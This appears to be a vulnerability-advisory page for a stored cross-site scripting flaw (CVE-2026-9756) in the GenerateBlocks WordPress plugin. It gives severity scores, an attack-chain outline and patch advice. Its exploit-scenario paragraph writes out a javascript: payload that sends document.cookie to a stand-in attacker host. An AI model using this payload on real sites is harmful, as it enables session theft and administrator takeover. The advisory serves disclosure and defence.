Skip to main content

GenerateBlocks EUVDEUVD-2026-41522

| CVE-2026-9756 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-03 Wordfence GHSA-735g-4w2p-c7c6
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Description requires victim to click the headline link (UI:R not UI:N); scope change retained as contributor payload executes in admin session; C:L/I:L reflect limited but real cross-user impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 03, 2026 - 09:16 vuln.today
CVE Published
Jul 03, 2026 - 07:53 cve.org
MEDIUM 6.4

DescriptionCVE.org

The GenerateBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Headline Block 'linkMetaFieldType' Dynamic Link Attribute in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A contributor-level attacker can store a JavaScript payload in their own profile description (allowlisted by get_safe_user_meta_keys()) and prepend 'javascript:' via the linkMetaFieldType attribute, creating a fully attacker-controlled href that executes when any user, including an administrator, clicks the rendered headline link.

AnalysisAI

Stored XSS in the GenerateBlocks WordPress plugin (all versions through 2.2.1) allows contributor-level authenticated attackers to inject arbitrary JavaScript via the Headline Block's linkMetaFieldType dynamic link attribute, executing in the browser of any user - including site administrators - who clicks the injected headline link. The attack chains a get_safe_user_meta_keys() allowlist bypass with insufficient URI scheme validation to construct a fully attacker-controlled javascript: href. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain contributor-level WordPress account
Delivery
Store javascript: URI payload in profile description meta field
Exploit
Create post with Headline Block referencing own meta via linkMetaFieldType
Install
Publish or share injected page
C2
Victim (including admin) clicks rendered headline link
Execute
Attacker JavaScript executes in victim browser session
Impact
Exfiltrate session token or perform privileged admin action

Vulnerability AssessmentAI

Exploitation Exploitation requires contributor-level (or higher) authenticated access to the WordPress site - confirmed by CVSS PR:L. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 3.1 score of 6.4 with vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N captures several key risk dimensions accurately but contains a notable inconsistency: the description explicitly states exploitation occurs 'when any user clicks the rendered headline link,' which is user-interactive behavior (UI:R), not UI:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A threat actor with contributor-level access stores a `javascript:document.location='https://attacker.example/steal?c='+document.cookie` payload in their WordPress profile description, which passes the `get_safe_user_meta_keys()` allowlist check. They then create or edit a page using the GenerateBlocks Headline Block, configuring `linkMetaFieldType` to reference their own profile meta field, causing the plugin to render a `javascript:`-prefixed href in the published page. …
Remediation Update GenerateBlocks to a version above 2.2.1 by installing the patched release via the WordPress plugin repository; the upstream fix is referenced at https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3582036%40generateblocks&new=3582036%40generateblocks. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-41522 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy